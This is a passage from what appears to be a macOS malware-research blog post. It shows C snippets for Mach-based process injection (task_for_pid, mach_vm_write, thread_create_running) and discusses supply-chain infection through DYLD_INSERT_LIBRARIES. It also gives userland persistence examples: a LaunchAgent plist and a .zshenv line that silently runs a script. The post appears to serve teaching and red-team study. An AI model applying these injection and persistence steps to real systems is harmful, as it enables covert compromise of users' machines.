But let’s tackle each problem one at a time. First things first, we need to write the injector,

The logic is simple: we take a single command-line argument, which is the PID (Process ID) of the target. From there, we get our hands on the target process using task_for_pid(). This call gives us the necessary task port to access the memory of the target process.

Once we’ve got the task port, the next step is to allocate memory within the target’s virtual address space. This is done using mach_vm_allocate(). Here, we allocate space for both a remote stack and our shellcode. After reserving the memory, we move on to writing the actual shellcode into the allocated space. Using mach_vm_write(), we place our shellcode into the reserved memory within the target process. This puts our injected code exactly where it needs to be in the remote process.

mach_vm_allocate(task, shellcode_addr, SHELLCODE_SIZE, VM_FLAGS_ANYWHERE);
mach_vm_write(task, *shellcode_addr, (vm_offset_t)shellcode, SHELLCODE_SIZE);
mach_vm_protect(task, *shellcode_addr, SHELLCODE_SIZE, FALSE, VM_PROT_READ | VM_PROT_EXECUTE);
mach_vm_allocate(task, stack_addr, STACK_SIZE, VM_FLAGS_ANYWHERE);

Now, things start to get a bit tricky with memory protection. Not all regions of memory are marked as executable. If we just wrote our shellcode into the memory without modifying the permissions, the system won’t let it run. So, to ensure our injected shellcode is executable, we use mach_vm_protect() to mark that region as executable. This allows us to make the code we injected run.

With the shellcode now in place and marked as executable, the next move is to tell the target process to actually execute it. We achieve this by creating a new thread in the target process using thread_create_running(). This is where we essentially redirect the target process’s execution flow to our shellcode, and the magic happens.

    x86_thread_state64_t state = {0};
    state.__rip = (uint64_t)shellcode_addr;
    state.__rsp = stack_addr + STACK_SIZE;

    thread_act_t thread;
    thread_create_running(task, x86_THREAD_STATE64, (thread_state_t)&state, x86_THREAD_STATE64_COUNT, &thread);
}

one more thing about this, after allocating the memory and writing the shellcode, we need to set the correct state for the remote thread to execute the code. Specifically, we need to set the instruction pointer (rip) to the address where our shellcode begins and the stack pointer (rsp) to point to the allocated remote stack.

Once we’ve set the state, we are almost ready to go. The last step to kick things off is to resume the thread using the thread_act_t. This will cause the thread to begin executing the shellcode, which is the final trigger that activates our injected payload.

Now, here’s something to note about Mach threads. Unlike POSIX threads that utilize thread-local storage (TLS) for managing thread-specific data, Mach threads don’t have this concept. This becomes relevant when injecting shellcode into a target process.

POSIX threads are well-managed, and their execution context is tightly controlled. They can easily manage TLS and other vital information. In contrast, Mach threads are more bare-bones and don’t support TLS by default. This creates complications when we attempt to execute injected shellcode within the context of a Mach thread.

When we inject our shellcode and spawn a remote thread, we can’t simply modify the thread’s instruction pointer (IP) to the shellcode location and expect it to run without a hitch. That’s because the context of the Mach thread may not be suitable for executing our unmanaged shellcode in a stable environment. To ensure smooth execution, we need to promote the injected shellcode from running in a Mach thread to a proper POSIX thread context.

meaning wrapping the shellcode execution in the environment that POSIX threads expect, making sure the thread’s context includes TLS and other necessary elements for stable operation. Once this promotion process is in place and the remote thread is successfully running, the shellcode takes control, and now we can proceed with our attack. We can establish connections to our C2 server, or run any other payload. all thanks to the successful injection.

As I mentioned earlier, this isn’t about handing you malware but about teaching the fundamentals of programming in this case, with a focus on Mach ;).

The idea here is to achieve infection and execution through a supply chain compromise, targeting older app versions like VeraCrypt or similar unsigned applications. Many third-party macOS apps often fail to implement proper hardening, such as allowing DYLD_INSERT_LIBRARIES.

Let’s talk about persistence. After gaining initial access to a system, it’s crucial to establish persistence. We don’t want to rely solely on our initial access point, as it could be closed or disrupted for a variety of reasons. To ensure continued access, it’s important to have a reliable method in place for maintaining control over the target system.

For macOS, there are a variety of persistence techniques, but many require root privileges or exploit low-level vulnerabilities to escalate. To keep it simple, let’s focus on Userland Persistence. I’ll explain some common and lesser-known persistence techniques, so you get a sense of how these methods work and how malware can use them.

Before diving into these techniques, I reviewed several macOS malware samples and threat reports. A consistent trend is that LaunchAgents and LaunchDaemons are the most common methods used for persistence. These methods are popular because they are simple and flexible, similar to how startup folder persistence works on Windows. However, they are also easy to detect, and similar techniques like LOLBins (Living off the Land Binaries) are well-known and widely understood.

LaunchAgent & LaunchDaemon

LaunchAgents and LaunchDaemons are fundamental to macOS, responsible for managing processes that run automatically. LaunchAgents are typically found in the ~/Library/LaunchAgents directory and are triggered when a user logs in. On the other hand, LaunchDaemons are found in /Library/LaunchDaemons and run tasks when the system starts.

Although LaunchAgents typically operate within user sessions, they can also be found in system directories like /System/Library/LaunchAgents, but modifying these would require disabling System Integrity Protection (SIP), LaunchDaemons, operating at the system level, require administrator privileges and are stored in /Library/LaunchDaemons.

Both LaunchAgents and LaunchDaemons are configured using .plist files that define commands or executable files to run. LaunchAgents are useful for tasks that require user interaction, while LaunchDaemons are designed for background processes.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.pre.foo.plist</string>
    <key>ProgramArguments</key>
    <array>
        <string>/Users/foo/dummy</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>

This file would ensure that the binary /Users/foo/dummy runs every time the user logs into the system. The launchd system handles it automatically.

Now, I originally considered using emond, a built-in macOS command located at /sbin/emond, to establish persistence. Emond is an event monitoring daemon that processes events from various services and executes actions based on predefined rules. It is started by launchd during system boot and is typically configured in /System/Library/LaunchDaemons/com.apple.emond.plist.

However, after reviewing the tool and researching more recent updates to macOS, I realized that emond is quite outdated and won’t work on newer systems. It seems that this tool is no longer reliable for establishing persistence on modern macOS versions. Therefore, I decided to exclude it from this discussion.

For further reading on emond and its historical use, you can check out the original article from Xorrior here.

Bash Profiles & Zsh Startup

In macOS, just like Linux, there are startup scripts like bash profiles that run whenever a terminal is opened. However, macOS uses Zsh as the default shell, and it has a similar feature: start files. Zsh also comes with an extra environment file, which ensures that commands can be run consistently across different shell interactions. For example, you could use the following setup:

~ > cat .zshenv
. "/Users/foo/startup.sh" > /dev/null 2>&1&

This will ensure that every time you open a terminal, the startup.sh script runs, providing an additional layer of persistence.

There are multiple persistence methods available on macOS, including LaunchAgents, LaunchDaemons, and Zsh startup files. Each has its strengths and weaknesses, but the key takeaway is that persistence is importenet for maintaining access once initial entry has been achieved.

These days, with all the public scripts and post-exploitation frameworks available, attackers prefer to get the job done quickly without wasting time or effort. Writing malware is time-consuming, so they target low-hanging fruit that’s simple enough for a malware author. Once malware gets detected, it’s pretty much useless. But for long-term operations, it requires skill and planning because you can’t afford to have the malware compromised early on. For something like a red team exercise, you’d test simpler methods and easy entry points before emulating more advanced threats.

A skilled attacker can bypass most security setups with just a simple MSFvenom shellcode. It often boils down to the simplest attacks. Normally, at this point, I’d talk about writing a simple malware, putting everything we’ve discussed into one complete piece of code. However, after some thought, adding more code here might just make things too complicated. so it would be better to save that for another article. custom malware deserve their own deep dive, next time tho.

Well, that’s it for now. We’ve laid a solid foundation, but there’s definitely more to explore. In the next part, we’ll dive deeper into advanced techniques like obfuscation, covert communication channels, and ways to ensure smooth operations.

If there’s anything we haven’t covered or if something feels unclear, feel free to reach out. We’ve touched on key concepts like code injection, persistence mechanisms, and how macOS syscalls work in practice through examples. But as always, there’s much more to uncover. Until next time.

Malware Research macOs